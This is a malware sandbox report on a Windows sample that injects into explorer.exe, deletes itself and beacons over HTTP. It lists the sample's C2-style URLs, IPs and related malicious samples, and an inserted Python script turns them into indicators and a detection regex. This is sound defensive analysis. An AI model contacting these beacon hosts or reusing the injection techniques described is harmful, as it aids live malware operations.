              ejecutable2.exe (started)
                  signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                  explorer.exe (injected)
                      DNS/IP: play-to-escape.com 81.169.145.77, 49172, 80 STRATOSTRATOAGDE Germany; www.pizza-mio.com 217.160.0.222, 49170, 80 ONEANDONE-ASBrauerstrasse48DE Germany; 10 other IPs or domains
                      signatures: System process connects to network (likely due to code injection or exploit)
                      wscript.exe (started)
                          signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                          cmd.exe (started)
                              signatures: Deletes itself after installation
              schtasks.exe (started)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          ejecutable2.exe | 28% | Virustotal |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          4.2.ejecutable2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.pizza-mio.com/u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv | 0% | Avira URL Cloud | safe
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.rspb.org.uk/wildlife/birdguide/name/ | 0% | Avira URL Cloud | safe
          http://www.tunetel.com/u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv | 0% | Avira URL Cloud | safe
          http://www.wwiilive.com/u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv | 0% | Avira URL Cloud | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://www.play-to-escape.com/u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv | 0% | Avira URL Cloud | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://java.sun.com | 0% | Avira URL Cloud | safe
          http://www.yhomggsmtdynchb.store/u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv | 0% | Avira URL Cloud | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://www.branchwallet.com/u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv | 0% | Avira URL Cloud | safe
          http://www.iptechcm.com/u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv | 0% | Avira URL Cloud | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          www.wwiilive.com/u4an/ | 0% | Avira URL Cloud | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.yhomggsmtdynchb.store | 5.101.152.161 | true | true | | unknown
          www.iptechcm.com | 195.77.116.8 | true | true | | unknown
          play-to-escape.com | 81.169.145.77 | true | true | | unknown
          HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | 3.223.115.185 | true | false | | high
          www.pizza-mio.com | 217.160.0.222 | true | true | | unknown
          wwiilive.com | 34.102.136.180 | true | false | | unknown
          cdl-lb-1356093980.us-east-1.elb.amazonaws.com | 35.168.81.157 | true | false | | high
          www.tunetel.com | unknown | unknown | true | | unknown
          www.play-to-escape.com | unknown | unknown | true | | unknown
          www.branchwallet.com | unknown | unknown | true | | unknown
          www.wwiilive.com | unknown | unknown | true | | unknown

                                Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.pizza-mio.com/u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv | true | Avira URL Cloud: safe | unknown
          http://www.tunetel.com/u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv | true | Avira URL Cloud: safe | unknown
          http://www.wwiilive.com/u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv | false | Avira URL Cloud: safe | unknown
          http://www.play-to-escape.com/u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv | true | Avira URL Cloud: safe | unknown
          http://www.yhomggsmtdynchb.store/u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv | true | Avira URL Cloud: safe | unknown
          http://www.branchwallet.com/u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv | true | Avira URL Cloud: safe | unknown
          http://www.iptechcm.com/u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv | true | Avira URL Cloud: safe | unknown
          www.wwiilive.com/u4an/ | true | Avira URL Cloud: safe | low

                                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://investor.msn.com | explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.rspb.org.uk/wildlife/birdguide/name/ | ejecutable2.exe, ejecutable2.exe, 00000004.00000000.422605822.0000000001122000.00000020.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerT | explorer.exe, 00000005.00000000.439477133.00000000044E7000.00000004.00000001.sdmp | false |  | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://treyresearch.net | explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp | false |  | high
http://java.sun.com | explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000005.00000000.472858003.000000000447A000.00000004.00000001.sdmp | false |  | high
http://investor.msn.com/ | explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp | false |  | high
http://www.piriform.com/ccleaner | explorer.exe, 00000005.00000000.473039091.0000000004513000.00000004.00000001.sdmp | false |  | high
http://computername/printers/printername/.printer | explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp | false |  | high
https://support.mozilla.org | explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp | false |  | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp | false |  | high
http://servername/isapibackend.dll | explorer.exe, 00000005.00000000.472044018.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                                        Contacted IPs


                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
217.160.0.222 | www.pizza-mio.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
5.101.152.161 | www.yhomggsmtdynchb.store | Russian Federation | 198610 | BEGET-ASRU | true
34.102.136.180 | wwiilive.com | United States | 15169 | GOOGLEUS | false
35.168.81.157 | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
3.223.115.185 | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
195.77.116.8 | www.iptechcm.com | Spain | 60493 | FICOSA-ASES | true
81.169.145.77 | play-to-escape.com | Germany | 6724 | STRATOSTRATOAGDE | true
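The "Contacted URLs" and "Contacted IPs" tables above are the actionable part of this report: seven hosts share the same path token and the same trailing query parameter value, while the first parameter changes per request, and only three of those hosts resolved while the sandbox ran. The script below, an added example and not part of the Joe Sandbox report, turns the two tables into a host list, a request-line pattern that survives domain rotation, and a resolved/unresolved view. The URL list and the domain-to-IP map are copied from the tables (the fused true/false "Malicious" cells dropped); the function names and the regex shape are this example's own choices, not the sandbox's.

```python
"""Derive network IOCs from the "Contacted URLs" and "Contacted IPs" tables of
this report. Added example; the data below is copied from the report tables,
the functions and the regex shape are this example's own."""
import re
from urllib.parse import urlparse

# Constructed from the report's "Contacted URLs" table.
CONTACTED_URLS = [
    "http://www.pizza-mio.com/u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv",
    "http://www.tunetel.com/u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv",
    "http://www.wwiilive.com/u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv",
    "http://www.play-to-escape.com/u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv",
    "http://www.yhomggsmtdynchb.store/u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv",
    "http://www.branchwallet.com/u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv",
    "http://www.iptechcm.com/u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv",
    "www.wwiilive.com/u4an/",
]

# Constructed from the report's "Contacted IPs" table: domain as listed -> IP.
RESOLVED = {
    "www.pizza-mio.com": "217.160.0.222",
    "www.yhomggsmtdynchb.store": "5.101.152.161",
    "wwiilive.com": "34.102.136.180",
    "cdl-lb-1356093980.us-east-1.elb.amazonaws.com": "35.168.81.157",
    "HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com": "3.223.115.185",
    "www.iptechcm.com": "195.77.116.8",
    "play-to-escape.com": "81.169.145.77",
}


def parse_beacon(url):
    """Split a URL into host, first path segment and ordered (name, value)
    query pairs. The query is split by hand because the values in the report
    carry '+', '/' and '=' characters that urllib's parse_qs would decode."""
    if "://" not in url:
        url = "http://" + url
    parts = urlparse(url)
    segments = [s for s in parts.path.split("/") if s]
    pairs = []
    for item in (parts.query.split("&") if parts.query else []):
        name, _, value = item.partition("=")   # first '=' only; values end in '=='
        pairs.append((name, value))
    return {"host": parts.hostname or "", "path": segments[0] if segments else "", "params": pairs}


def extract_iocs(urls):
    """Hosts, path tokens and the trailing query parameter shared by every
    complete beacon URL. Here the first parameter changes per request while
    the path token and the last parameter stay fixed across all hosts."""
    hosts, paths, ids = set(), set(), set()
    for url in urls:
        b = parse_beacon(url)
        hosts.add(b["host"])
        if b["path"]:
            paths.add(b["path"])
        if len(b["params"]) == 2:
            ids.add(b["params"][1])            # (name, value) of the fixed parameter
    return {"hosts": hosts, "paths": paths, "ids": ids}


def build_uri_pattern(path, id_name, id_value):
    """Request-line regex that pins the fixed path token and trailing
    parameter while leaving the variable first parameter free."""
    return re.compile(
        r"/" + re.escape(path) + r"/\?[A-Za-z0-9]+=[^&]+&"
        + re.escape(id_name) + "=" + re.escape(id_value) + r"$"
    )


def resolve_hosts(hosts, resolved=RESOLVED):
    """Map each beacon host to the IP the sandbox saw, or None when that exact
    name did not resolve during analysis (www.tunetel.com, for instance)."""
    return {h: resolved.get(h) for h in sorted(hosts)}


if __name__ == "__main__":
    iocs = extract_iocs(CONTACTED_URLS)
    pattern = build_uri_pattern(next(iter(iocs["paths"])), *next(iter(iocs["ids"])))
    print("uri pattern:", pattern.pattern)
    for host, ip in resolve_hosts(iocs["hosts"]).items():
        print(f"{host:30} {ip or 'did not resolve'}")
```

The hosts that returned no address during the run (tunetel, branchwallet, www.wwiilive.com) are still indicators: the sample tried them, and a later run or a different resolver may succeed. The request-line pattern is the piece worth keeping after the domains are dead, since it is built from the two fields this report shows to be constant across every host.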

                                                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 491547
Start date: 27.09.2021
Start time: 17:36:35
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 27s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ejecutable2.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/3@7/7
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 19.8% (good quality ratio 19%)
• Quality average: 72.9%
• Quality standard deviation: 26.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

Time | Type | Description
17:37:21 | API Interceptor | 119x Sleep call for process: ejecutable2.exe modified
17:37:26 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
17:37:56 | API Interceptor | 206x Sleep call for process: wscript.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

Match | Associated Sample Name / URL | Detection | Context
217.160.0.222 | AGG Orders No.76654746.exe | malicious | www.tom-tours2020.com/fznn/?o4=cXPhyP9&5j=u27IvXm+hbaV8INHh0f6a1yxSgZd9KESHXCt3WOKFyf5bqYZvM58y/1Tcs4Wg0DGxtzk
217.160.0.222 | SKMC_INV4581809261.htm | malicious | todoviajesmexico.es/administrator/components/com_newsfeeds/models/fields/prefetch.html
5.101.152.161 | LWlcpDjYIQ.exe | malicious | www.shopthen2.site/sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9
3.223.115.185 | Payment Copy.exe | malicious | www.altitudebc.com/b2c0/?Wx=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDcF/kMSmyOUi&sTt=6lCLOfO0bt
3.223.115.185 | doc0490192021092110294.exe | malicious | www.seulookexpress.com/ergs/?6luD=ArC4&5jcL=OU4cGAkKVLLkrCY3hQtHSLVlGeNNrg+hKPPQquNIEGJPQ/Qp4blyZqjMIsCGiUdK07Fz
3.223.115.185 | DN-32T56U8I90.exe | malicious | www.signotimes.com/r95e/?t2J=eN9DIX&5j=u87/zzdHnjyiiYCQYJoPXTFXUvR0cxqMluwUNOYe+bVhHtGvcungr7rx2QZknm2l/CPil/4RCA==
3.223.115.185 | DUE PAYMENT.exe | malicious | www.altitudebc.com/b2c0/?2dpPwJP=Tgem/L38QS6Yd7Kt809e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfFK44Gd2P5m&uN9=3fPH4rk8fd4xHD
3.223.115.185 | popis narudzbi nalazi se u privitku.exe | malicious | www.iniciala.com/bc3s/?X6=cS/yJdBEXHQUQt/YsjdBdiWL3hK2uHUamMjKnoPayZNwSaf+qTha/Q2E77OzEi/pfb0c&m47Ly=3fIdx
3.223.115.185 | MV MIGHTY CHAMP.xlsx | malicious | www.bluewinetours.com/arup/?OtxT=4hJhW2&O8PDFP7=7PqJqCZn8GjJovFDN7RJavJcukSULZ9xovwwwTa882pBqoNTfIjDpf3poFC4//6TqAfIxw==
3.223.115.185 | TNT 07833955.exe | malicious | www.giasuvina.com/b5ce/?2dtd=2dTpyPZX3Tqt_8d0&C2M=neK9vWkzQb/i+TXFw+Ot4kxbuZeQr8vMtqBbqBkCWAXt9k2ThG+M1QMqvFlDXn/vvHHTHdm0Sw==
3.223.115.185 | TU22.doc | malicious | www.domainnameshq.com/fzsg/?ZdYxLd=FpAYqwBMZReb7VaVU+WJOSQ4WoTxWPVod56hX46jJDylhB9oQsN2WSnTCSHjkAgFZbnkRg==&-ZBd1H=3fsLml2xVvWhz
3.223.115.185 | XJC22GTCOo.exe | malicious | www.exsalon.com/n90q/?7n=EWb7O5uDST21DmEQtUDuT7v/S66I5c1eO1VxCS+RLC6C09812XzJCW4fhgESJ+3qzQUZ+STCoQ==&7ndL=k0DxZ018
3.223.115.185 | Medtronics Product catalog and prices_pdf.exe | malicious | www.eveningcapital.com/u89u/?1bfLX=sET9/ZIM+tfMK85P8vHHa1pj+88tdYVW/M4RThAJEOsyXEVz37pnOUBMvHOpPt8OHsJl&E4=htxPBFXH
3.223.115.185 | PO. 2100002_pdf____________________________________.exe | malicious | www.qireys.com/ajki/?8pT0y=Cjz9q8vjTGWvp8RhsSK5VdylhQ4lsw4Fp7FxaG7ExaDhhoYKYBCDfWUbwXZfYVgeCTtL&7nJtk=i2MleNCX-NehY2
3.223.115.185 | vbc(2).exe | malicious | www.valueplants.com/imi7/?mV=NitttW/cnwcA3UoNcNe0zUvo8gqBnfpONYnxirAmCPSjusgN3ME6G7OawpQ0UxGeKCxa&u0Gd=KXZ03xuhoh
3.223.115.185 | PO211000386.xlsx | malicious | www.valueplants.com/imi7/?9rdh=-ZutZR3814lxCzs&j4l=NitttW/Zn3cE3EkBeNe0zUvo8gqBnfpONY/h+ocnGvSiudMLwcV2Q/2YzM8iQhCtBBsqsA==
3.223.115.185 | PI001.exe | malicious | www.flawlesscrystals.com/h2m4/?0R=JL0PA2&d2JlP0UX=eRKdapmLhFg2JzVulq5wnOi64roeGy4E4rWX/vUswxdVIpgT3rACey4tmoGNaCYL4SyJ
3.223.115.185 | KOC RFQ.exe | malicious | www.suavit.com/ucze/?FR-=5dea/O/5YmqEQLbQKq30QtUCbc5nCXgb7o+dmCN9amADGlToCm2KZLfP+nPUxw0t/6vH&SpKPfp=4hFHRfGXy
3.223.115.185 | SKM_Ref_MT103_23-08-2021.exe | malicious | www.mdp6.com/lbl5/?k48=4hL0MPt&Fp1=qdSsbsw9YR/FMC8wyOt64ByIS1RHdC4G+eyUqWU3tbxwkEl8mKCtfOX7Ts9FPfH20Yeb
3.223.115.185 | SKMBT 23082021 Ref MT103.exe | malicious | www.mdp6.com/lbl5/?FP5Ty=qdSsbsw9YR/FMC8wyOt64ByIS1RHdC4G+eyUqWU3tbxwkEl8mKCtfOX7Ts9FPfH20Yeb&q48HHL=RPIxB4vPuHkTtXm0
3.223.115.185 | rich.exe | malicious | www.plannerfest.com/angp/?3fuH=1bVdAz0HBbVxO&aDKd98=LebAxvoSsmh3sudqelHMjl0Ldg/3v2S2FRJj7Yk0bUFQzapFT0LdkoC3w8yZmTIuMJ+/
3.223.115.185 | Swift_copy#4554.exe | malicious | www.highcityguide.com/ma5c/?WBX8i=usnDfYhKyYT60rU2MkfK9q1OimbKjbR4fv1LmoxN/9/ePah6q21uNZtZa7lmgZMBIS9e&f6j8=h2MXmN7H5
3.223.115.185 | New Order 2492.xlsx | malicious | www.polarjob.com/kzk9/?kjf8Jz-X=KQPEGa+FIg0XMKlEqqA6KWCR1xHvJfeteGuIWS2+zhN7A5rywip/cTC1Vv902HlKGAxmyw==&aHsd=c2MdAnb8vb1xmj1

                                                        Domains

Match | Associated Sample Name / URL | Detection | Context
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | PURCHASE ORDER I 5083.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | Payment Copy.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | doc0490192021092110294.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | DN-32T56U8I90.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | DUE PAYMENT.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | popis narudzbi nalazi se u privitku.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | MV MIGHTY CHAMP.xlsx | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | TNT 07833955.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | TU22.doc | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | XJC22GTCOo.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | Medtronics Product catalog and prices_pdf.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | 77dsREO8Me.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | PO. 2100002_pdf____________________________________.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | vbc(2).exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | PO211000386.xlsx | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | PI001.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | KOC RFQ.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | GSwiAEpeZP.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | QUOTATION 2021.08.28.exe | malicious | 3.223.115.185
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | SKM_Ref_MT103_23-08-2021.exe | malicious | 3.223.115.185
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | QUOTATION.exe | malicious | 54.85.93.188
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | truck pictures.exe | malicious | 54.85.93.188
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | TT Swift Copy.exe | malicious | 18.208.31.123
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | COAU7229898130.xlsx | malicious | 18.208.31.123
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | KOC RFQ.doc | malicious | 52.204.77.43
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | DOC.exe | malicious | 54.85.93.188
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | SOA.exe | malicious | 23.20.208.181
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | REQUEST_PURCHASE_INQUIRY (2).exe | malicious | 54.85.93.188
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | Y0GEeY1WOWNMYni.exe | malicious | 52.205.158.209
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | PVCbiDUqly50DqS.exe | malicious | 52.205.158.209
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | Inquiry.exe | malicious | 52.205.158.209
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | Order_confirmation_ SMKT 09062021_.exe | malicious | 18.208.31.123
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | PO9887655.exe | malicious | 18.208.31.123
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | nFzJnfmTNh.exe | malicious | 52.7.227.88
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | catalogo campione_0021.exe | malicious | 52.7.227.88
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | 0039234_00533MXS2.exe | malicious | 52.7.227.88
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | Unpaid Invoice.exe | malicious | 23.20.208.181
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | SOA.exe | malicious | 52.21.182.71
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | Remmittance Advise.exe | malicious | 67.202.20.60
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | Swift Copy.exe | malicious | 67.202.20.60

                                                        ASN

Match | Associated Sample Name / URL | Detection | Context
ONEANDONE-ASBrauerstrasse48DE | index_2021-09-25-14_08.exe | malicious | 217.160.0.15
ONEANDONE-ASBrauerstrasse48DE | IKpep4Zn5S.exe | malicious | 217.160.230.95
ONEANDONE-ASBrauerstrasse48DE | MV DINA QUEEN.xlsx | malicious | 217.160.230.95
ONEANDONE-ASBrauerstrasse48DE | PAYMENT COPY.exe | malicious | 217.160.0.159
ONEANDONE-ASBrauerstrasse48DE | Medical Order 092021.exe | malicious | 217.160.0.250
ONEANDONE-ASBrauerstrasse48DE | cs.exe | malicious | 217.174.240.46
ONEANDONE-ASBrauerstrasse48DE | DUE PAYMENT.exe | malicious | 74.208.236.156
ONEANDONE-ASBrauerstrasse48DE | INV 563256 and 373PDF.exe | malicious | 74.208.236.222
ONEANDONE-ASBrauerstrasse48DE | SYsObQNkC1.exe | malicious | 217.160.0.253
ONEANDONE-ASBrauerstrasse48DE | v2XwLpMqG5.exe | malicious | 217.160.0.177
ONEANDONE-ASBrauerstrasse48DE | 1vY5i8g38s.exe | malicious | 217.160.243.54
ONEANDONE-ASBrauerstrasse48DE | JNk46WKTxo.exe | malicious | 212.227.210.118
ONEANDONE-ASBrauerstrasse48DE | KTi0r6xqtH.exe | malicious | 77.68.79.72
ONEANDONE-ASBrauerstrasse48DE | Z14S9Zolcyub1pd.exe | malicious | 217.76.156.252
ONEANDONE-ASBrauerstrasse48DE | SOA.exe | malicious | 213.171.195.105
ONEANDONE-ASBrauerstrasse48DE | UfJYgKlooF.exe | malicious | 74.208.236.226
ONEANDONE-ASBrauerstrasse48DE | Payment Proof pdf.exe | malicious | 74.208.236.82
ONEANDONE-ASBrauerstrasse48DE | justificante de la transfer.exe | malicious | 212.227.15.142
ONEANDONE-ASBrauerstrasse48DE | UPDATED e-STATEMENT..exe | malicious | 217.160.0.49
